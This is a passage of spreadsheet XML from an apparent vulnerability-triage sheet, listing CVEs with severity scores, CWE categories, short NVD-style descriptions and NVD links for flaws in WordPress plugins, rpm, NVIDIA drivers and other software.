      <c r="G311" s="5" t="inlineStr"/>
      <c r="H311" s="5" t="inlineStr"/>
      <c r="I311" s="5" t="inlineStr"/>
      <c r="J311" s="5" t="inlineStr"/>
      <c r="K311" s="5" t="inlineStr"/>
      <c r="L311" s="5" t="inlineStr"/>
      <c r="M311" s="5" t="inlineStr"/>
      <c r="N311" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O311" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P311" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q311" s="5" t="inlineStr"/>
      <c r="R311" s="5" t="inlineStr">
        <is>
          <t>CWE-22</t>
        </is>
      </c>
      <c r="S311" s="5" t="inlineStr">
        <is>
          <t>EasyFlow .NET developed by Digiwin has an Arbitrary File Read vulnerability. Authenticated remote attackers can exploit this vulnerability to download arbitrary system files.</t>
        </is>
      </c>
      <c r="T311" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-102457</t>
        </is>
      </c>
    </row>
    <row r="312">
      <c r="A312" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B312" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C312" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-103242</t>
        </is>
      </c>
      <c r="D312" s="5" t="n">
        <v>7.1</v>
      </c>
      <c r="E312" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F312" s="5" t="inlineStr">
        <is>
          <t>secalert@redhat.com</t>
        </is>
      </c>
      <c r="G312" s="5" t="inlineStr"/>
      <c r="H312" s="5" t="inlineStr"/>
      <c r="I312" s="5" t="inlineStr"/>
      <c r="J312" s="5" t="inlineStr">
        <is>
          <t>rust</t>
        </is>
      </c>
      <c r="K312" s="5" t="inlineStr"/>
      <c r="L312" s="5" t="inlineStr"/>
      <c r="M312" s="5" t="inlineStr"/>
      <c r="N312" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O312" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P312" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q312" s="5" t="inlineStr"/>
      <c r="R312" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="S312" s="5" t="inlineStr">
        <is>
          <t>A heap-based buffer overflow flaw was found in rpm. RPMTAG_FILESIGNATURES in a crafted, unsigned RPM package's main header is declared with the wrong header type, causing hex2binv() to allocate a one-byte buffer and then write the tag's attacker-controlled, hex-decoded content — of attacker-chosen length — past the end of that allocation. This is reachable via rpm2cpio, rpm2archive, and rpm -qlvp on an untrusted package.</t>
        </is>
      </c>
      <c r="T312" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-103242</t>
        </is>
      </c>
    </row>
    <row r="313">
      <c r="A313" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B313" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C313" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-27371</t>
        </is>
      </c>
      <c r="D313" s="5" t="n">
        <v>7.1</v>
      </c>
      <c r="E313" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F313" s="5" t="inlineStr">
        <is>
          <t>audit@patchstack.com</t>
        </is>
      </c>
      <c r="G313" s="5" t="inlineStr"/>
      <c r="H313" s="5" t="inlineStr"/>
      <c r="I313" s="5" t="inlineStr"/>
      <c r="J313" s="5" t="inlineStr"/>
      <c r="K313" s="5" t="inlineStr"/>
      <c r="L313" s="5" t="inlineStr"/>
      <c r="M313" s="5" t="inlineStr"/>
      <c r="N313" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O313" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P313" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q313" s="5" t="inlineStr"/>
      <c r="R313" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="S313" s="5" t="inlineStr">
        <is>
          <t>Unauthenticated Cross Site Scripting (XSS) in WPFunnels &lt;= 3.13.1 versions.</t>
        </is>
      </c>
      <c r="T313" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-27371</t>
        </is>
      </c>
    </row>
    <row r="314">
      <c r="A314" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B314" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C314" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-47554</t>
        </is>
      </c>
      <c r="D314" s="5" t="n">
        <v>7.1</v>
      </c>
      <c r="E314" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F314" s="5" t="inlineStr">
        <is>
          <t>psirt@nvidia.com</t>
        </is>
      </c>
      <c r="G314" s="5" t="inlineStr"/>
      <c r="H314" s="5" t="inlineStr"/>
      <c r="I314" s="5" t="inlineStr"/>
      <c r="J314" s="5" t="inlineStr"/>
      <c r="K314" s="5" t="inlineStr"/>
      <c r="L314" s="5" t="inlineStr"/>
      <c r="M314" s="5" t="inlineStr"/>
      <c r="N314" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O314" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P314" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q314" s="5" t="inlineStr"/>
      <c r="R314" s="5" t="inlineStr">
        <is>
          <t>CWE-347</t>
        </is>
      </c>
      <c r="S314" s="5" t="inlineStr">
        <is>
          <t>NVIDIA GPU Display Driver for Linux contains a vulnerability in the kernel mode layer where improper verification of cryptographic signatures may cause signature verification to be bypassed under memory pressure. A successful exploit of this vulnerability might lead to denial of service and data tampering.</t>
        </is>
      </c>
      <c r="T314" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-47554</t>
        </is>
      </c>
    </row>
    <row r="315">
      <c r="A315" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B315" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C315" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-47602</t>
        </is>
      </c>
      <c r="D315" s="5" t="n">
        <v>7.1</v>
      </c>
      <c r="E315" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F315" s="5" t="inlineStr">
        <is>
          <t>psirt@nvidia.com</t>
        </is>
      </c>
      <c r="G315" s="5" t="inlineStr"/>
      <c r="H315" s="5" t="inlineStr"/>
      <c r="I315" s="5" t="inlineStr"/>
      <c r="J315" s="5" t="inlineStr">
        <is>
          <t>rust</t>
        </is>
      </c>
      <c r="K315" s="5" t="inlineStr"/>
      <c r="L315" s="5" t="inlineStr"/>
      <c r="M315" s="5" t="inlineStr"/>
      <c r="N315" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O315" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P315" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q315" s="5" t="inlineStr"/>
      <c r="R315" s="5" t="inlineStr">
        <is>
          <t>CWE-119</t>
        </is>
      </c>
      <c r="S315" s="5" t="inlineStr">
        <is>
          <t>NVIDIA GPU Display Driver for Windows and Linux contains a vulnerability in the kernel mode driver where a local user can cause the driver to dereference an untrusted pointer. A successful exploit of this vulnerability might lead to denial of service and information disclosure.</t>
        </is>
      </c>
      <c r="T315" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-47602</t>
        </is>
      </c>
    </row>
    <row r="316">
      <c r="A316" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B316" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C316" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-78210</t>
        </is>
      </c>
      <c r="D316" s="5" t="n">
        <v>7.1</v>
      </c>
      <c r="E316" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F316" s="5" t="inlineStr">
        <is>
          <t>security@octopus.com</t>
        </is>
      </c>
      <c r="G316" s="5" t="inlineStr"/>
      <c r="H316" s="5" t="inlineStr"/>
      <c r="I316" s="5" t="inlineStr"/>
      <c r="J316" s="5" t="inlineStr"/>
      <c r="K316" s="5" t="inlineStr"/>
      <c r="L316" s="5" t="inlineStr"/>
      <c r="M316" s="5" t="inlineStr"/>
      <c r="N316" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O316" s="5" t="inlineStr">
        <is>
          <t>2026-10-01</t>
        </is>
      </c>
      <c r="P316" s="5" t="inlineStr">
        <is>
          <t>2026-10-01</t>
        </is>
      </c>
      <c r="Q316" s="5" t="inlineStr"/>
      <c r="R316" s="5" t="inlineStr">
        <is>
          <t>CWE-863</t>
        </is>
      </c>
      <c r="S316" s="5" t="inlineStr">
        <is>
          <t>In affected versions of Octopus Server, users with certain scoped permission sets could execute arbitrary scripts in an environment without possessing the required authorization.</t>
        </is>
      </c>
      <c r="T316" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-78210</t>
        </is>
      </c>
    </row>
    <row r="317">
      <c r="A317" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B317" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C317" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-92869</t>
        </is>
      </c>
      <c r="D317" s="5" t="n">
        <v>7.1</v>
      </c>
      <c r="E317" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F317" s="5" t="inlineStr">
        <is>
          <t>vultures@jpcert.or.jp</t>
        </is>
      </c>
      <c r="G317" s="5" t="inlineStr"/>
      <c r="H317" s="5" t="inlineStr"/>
      <c r="I317" s="5" t="inlineStr"/>
      <c r="J317" s="5" t="inlineStr"/>
      <c r="K317" s="5" t="inlineStr"/>
      <c r="L317" s="5" t="inlineStr"/>
      <c r="M317" s="5" t="inlineStr"/>
      <c r="N317" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O317" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P317" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q317" s="5" t="inlineStr"/>
      <c r="R317" s="5" t="inlineStr">
        <is>
          <t>CWE-787</t>
        </is>
      </c>
      <c r="S317" s="5" t="inlineStr">
        <is>
          <t>An out-of-bounds write vulnerability exists in Pgpool-II, which may allow an authenticated attacker to cause abnormal process termination.</t>
        </is>
      </c>
      <c r="T317" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-92869</t>
        </is>
      </c>
    </row>
    <row r="318">
      <c r="A318" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B318" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C318" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-93512</t>
        </is>
      </c>
      <c r="D318" s="5" t="n">
        <v>7.1</v>
      </c>
      <c r="E318" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F318" s="5" t="inlineStr">
        <is>
          <t>audit@patchstack.com</t>
        </is>
      </c>
      <c r="G318" s="5" t="inlineStr"/>
      <c r="H318" s="5" t="inlineStr"/>
      <c r="I318" s="5" t="inlineStr"/>
      <c r="J318" s="5" t="inlineStr"/>
      <c r="K318" s="5" t="inlineStr"/>
      <c r="L318" s="5" t="inlineStr"/>
      <c r="M318" s="5" t="inlineStr"/>
      <c r="N318" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O318" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P318" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q318" s="5" t="inlineStr"/>
      <c r="R318" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="S318" s="5" t="inlineStr">
        <is>
          <t>Unauthenticated Cross Site Scripting (XSS) in JW Player for WordPress &lt;= 2.3.11 versions.</t>
        </is>
      </c>
      <c r="T318" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-93512</t>
        </is>
      </c>
    </row>
    <row r="319">
      <c r="A319" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B319" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C319" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-93514</t>
        </is>
      </c>
      <c r="D319" s="5" t="n">
        <v>7.1</v>
      </c>
      <c r="E319" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F319" s="5" t="inlineStr">
        <is>
          <t>audit@patchstack.com</t>
        </is>
      </c>
      <c r="G319" s="5" t="inlineStr"/>
      <c r="H319" s="5" t="inlineStr"/>
      <c r="I319" s="5" t="inlineStr"/>
      <c r="J319" s="5" t="inlineStr"/>
      <c r="K319" s="5" t="inlineStr"/>
      <c r="L319" s="5" t="inlineStr"/>
      <c r="M319" s="5" t="inlineStr"/>
      <c r="N319" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O319" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P319" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q319" s="5" t="inlineStr"/>
      <c r="R319" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="S319" s="5" t="inlineStr">
        <is>
          <t>Unauthenticated Cross Site Scripting (XSS) in Notification for Telegram &lt;= 3.5.2 versions.</t>
        </is>
      </c>
      <c r="T319" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-93514</t>
        </is>
      </c>
    </row>
    <row r="320">
      <c r="A320" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B320" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C320" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-93770</t>
        </is>
      </c>
      <c r="D320" s="5" t="n">
        <v>7.1</v>
      </c>
      <c r="E320" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F320" s="5" t="inlineStr">
        <is>
          <t>audit@patchstack.com</t>
        </is>
      </c>
      <c r="G320" s="5" t="inlineStr"/>
      <c r="H320" s="5" t="inlineStr"/>
      <c r="I320" s="5" t="inlineStr"/>
      <c r="J320" s="5" t="inlineStr"/>
      <c r="K320" s="5" t="inlineStr"/>
      <c r="L320" s="5" t="inlineStr"/>
      <c r="M320" s="5" t="inlineStr"/>
      <c r="N320" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O320" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P320" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q320" s="5" t="inlineStr"/>
      <c r="R320" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="S320" s="5" t="inlineStr">
        <is>
          <t>Unauthenticated Cross Site Scripting (XSS) in WP Statistics &lt;= 14.16.13 versions.</t>
        </is>
      </c>
      <c r="T320" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-93770</t>
        </is>
      </c>
    </row>
    <row r="321">
      <c r="A321" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B321" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C321" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-94078</t>
        </is>
      </c>
      <c r="D321" s="5" t="n">
        <v>7.1</v>
      </c>
      <c r="E321" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F321" s="5" t="inlineStr">
        <is>
          <t>audit@patchstack.com</t>
        </is>
      </c>
      <c r="G321" s="5" t="inlineStr"/>
      <c r="H321" s="5" t="inlineStr"/>
      <c r="I321" s="5" t="inlineStr"/>
      <c r="J321" s="5" t="inlineStr"/>
      <c r="K321" s="5" t="inlineStr"/>
      <c r="L321" s="5" t="inlineStr"/>
      <c r="M321" s="5" t="inlineStr"/>
      <c r="N321" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O321" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P321" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q321" s="5" t="inlineStr"/>
      <c r="R321" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="S321" s="5" t="inlineStr">
        <is>
          <t>Unauthenticated Cross Site Scripting (XSS) in Site Reviews &lt;= 8.3.1 versions.</t>
        </is>
      </c>
      <c r="T321" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-94078</t>
        </is>
      </c>
    </row>
    <row r="322">
      <c r="A322" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B322" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C322" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-94081</t>
        </is>
      </c>
      <c r="D322" s="5" t="n">
        <v>7.1</v>
      </c>
      <c r="E322" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F322" s="5" t="inlineStr">
        <is>
          <t>audit@patchstack.com</t>
        </is>
      </c>
      <c r="G322" s="5" t="inlineStr"/>
      <c r="H322" s="5" t="inlineStr"/>
      <c r="I322" s="5" t="inlineStr"/>
      <c r="J322" s="5" t="inlineStr">
        <is>
          <t>gin</t>
        </is>
      </c>
      <c r="K322" s="5" t="inlineStr"/>
      <c r="L322" s="5" t="inlineStr"/>
      <c r="M322" s="5" t="inlineStr"/>
      <c r="N322" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O322" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P322" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q322" s="5" t="inlineStr"/>
      <c r="R322" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="S322" s="5" t="inlineStr">
        <is>
          <t>Unauthenticated Cross Site Scripting (XSS) in WordPress Persistent Login &lt;= 3.1.3 versions.</t>
        </is>
      </c>
      <c r="T322" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-94081</t>
        </is>
      </c>
    </row>
    <row r="323">
      <c r="A323" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B323" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C323" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-94171</t>
        </is>
      </c>
      <c r="D323" s="5" t="n">
        <v>7.1</v>
      </c>
      <c r="E323" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F323" s="5" t="inlineStr">
        <is>
          <t>audit@patchstack.com</t>
        </is>
      </c>
      <c r="G323" s="5" t="inlineStr"/>
      <c r="H323" s="5" t="inlineStr"/>
      <c r="I323" s="5" t="inlineStr"/>
      <c r="J323" s="5" t="inlineStr"/>
      <c r="K323" s="5" t="inlineStr"/>
      <c r="L323" s="5" t="inlineStr"/>
      <c r="M323" s="5" t="inlineStr"/>
      <c r="N323" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O323" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P323" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q323" s="5" t="inlineStr"/>
      <c r="R323" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="S323" s="5" t="inlineStr">
        <is>
          <t>Unauthenticated Cross Site Scripting (XSS) in CURCY &lt;= 2.2.16 versions.</t>
        </is>
      </c>
      <c r="T323" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-94171</t>
        </is>
      </c>
    </row>
    <row r="324">
      <c r="A324" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B324" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C324" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-94499</t>
        </is>
      </c>
      <c r="D324" s="5" t="n">
        <v>7.1</v>
      </c>
      <c r="E324" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F324" s="5" t="inlineStr">
        <is>
          <t>audit@patchstack.com</t>
        </is>
      </c>
      <c r="G324" s="5" t="inlineStr"/>
      <c r="H324" s="5" t="inlineStr"/>
      <c r="I324" s="5" t="inlineStr"/>
      <c r="J324" s="5" t="inlineStr"/>
      <c r="K324" s="5" t="inlineStr"/>
      <c r="L324" s="5" t="inlineStr"/>
      <c r="M324" s="5" t="inlineStr"/>
      <c r="N324" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O324" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P324" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q324" s="5" t="inlineStr"/>
      <c r="R324" s="5" t="inlineStr">
        <is>
          <t>CWE-862</t>
        </is>
      </c>
      <c r="S324" s="5" t="inlineStr">
        <is>
          <t>Subscriber Broken Access Control in FormGent &lt;= 1.12.2 versions.</t>
        </is>
      </c>
      <c r="T324" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-94499</t>
        </is>
      </c>
    </row>
    <row r="325">
      <c r="A325" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B325" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C325" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-96351</t>
        </is>
      </c>
      <c r="D325" s="5" t="n">
        <v>7.1</v>
      </c>
      <c r="E325" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F325" s="5" t="inlineStr">
        <is>
          <t>audit@patchstack.com</t>
        </is>
      </c>
      <c r="G325" s="5" t="inlineStr"/>
      <c r="H325" s="5" t="inlineStr"/>
      <c r="I325" s="5" t="inlineStr"/>
      <c r="J325" s="5" t="inlineStr"/>
      <c r="K325" s="5" t="inlineStr"/>
      <c r="L325" s="5" t="inlineStr"/>
      <c r="M325" s="5" t="inlineStr"/>
      <c r="N325" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O325" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P325" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q325" s="5" t="inlineStr"/>
      <c r="R325" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="S325" s="5" t="inlineStr">
        <is>
          <t>Unauthenticated Cross Site Scripting (XSS) in Classified Listing &lt;= 6.1.3 versions.</t>
        </is>
      </c>
      <c r="T325" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-96351</t>
        </is>
      </c>
    </row>
    <row r="326">
      <c r="A326" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B326" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C326" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-96352</t>
        </is>
      </c>
      <c r="D326" s="5" t="n">
        <v>7.1</v>
      </c>
      <c r="E326" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F326" s="5" t="inlineStr">
        <is>
          <t>audit@patchstack.com</t>
        </is>
      </c>
      <c r="G326" s="5" t="inlineStr"/>
      <c r="H326" s="5" t="inlineStr"/>
      <c r="I326" s="5" t="inlineStr"/>
      <c r="J326" s="5" t="inlineStr"/>
      <c r="K326" s="5" t="inlineStr"/>
      <c r="L326" s="5" t="inlineStr"/>
      <c r="M326" s="5" t="inlineStr"/>
      <c r="N326" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O326" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P326" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q326" s="5" t="inlineStr"/>
      <c r="R326" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="S326" s="5" t="inlineStr">
        <is>
          <t>Unauthenticated Cross Site Scripting (XSS) in YITH WooCommerce Ajax Search &lt;= 2.28.0 versions.</t>
        </is>
      </c>
      <c r="T326" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-96352</t>
        </is>
      </c>
    </row>
    <row r="327">
      <c r="A327" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B327" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C327" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-96814</t>
        </is>
      </c>
      <c r="D327" s="5" t="n">
        <v>7.1</v>
      </c>
      <c r="E327" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F327" s="5" t="inlineStr">
        <is>
          <t>audit@patchstack.com</t>
        </is>
      </c>
      <c r="G327" s="5" t="inlineStr"/>
      <c r="H327" s="5" t="inlineStr"/>
      <c r="I327" s="5" t="inlineStr"/>
      <c r="J327" s="5" t="inlineStr"/>
      <c r="K327" s="5" t="inlineStr"/>
      <c r="L327" s="5" t="inlineStr"/>
      <c r="M327" s="5" t="inlineStr"/>
      <c r="N327" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O327" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P327" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q327" s="5" t="inlineStr"/>
      <c r="R327" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="S327" s="5" t="inlineStr">
        <is>
          <t>Unauthenticated Cross Site Scripting (XSS) in WooCommerce Product Table Lite &lt;= 5.6.7 versions.</t>
        </is>
      </c>
      <c r="T327" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-96814</t>
        </is>
      </c>
    </row>
    <row r="328">
      <c r="A328" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B328" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C328" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-96816</t>
        </is>
      </c>
      <c r="D328" s="5" t="n">
        <v>7.1</v>
      </c>
      <c r="E328" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F328" s="5" t="inlineStr">
        <is>
          <t>audit@patchstack.com</t>
        </is>
      </c>
      <c r="G328" s="5" t="inlineStr"/>
      <c r="H328" s="5" t="inlineStr"/>
      <c r="I328" s="5" t="inlineStr"/>
      <c r="J328" s="5" t="inlineStr">
        <is>
          <t>rust</t>
        </is>
      </c>
      <c r="K328" s="5" t="inlineStr"/>
      <c r="L328" s="5" t="inlineStr"/>
      <c r="M328" s="5" t="inlineStr"/>
      <c r="N328" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O328" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P328" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q328" s="5" t="inlineStr"/>
      <c r="R328" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="S328" s="5" t="inlineStr">
        <is>
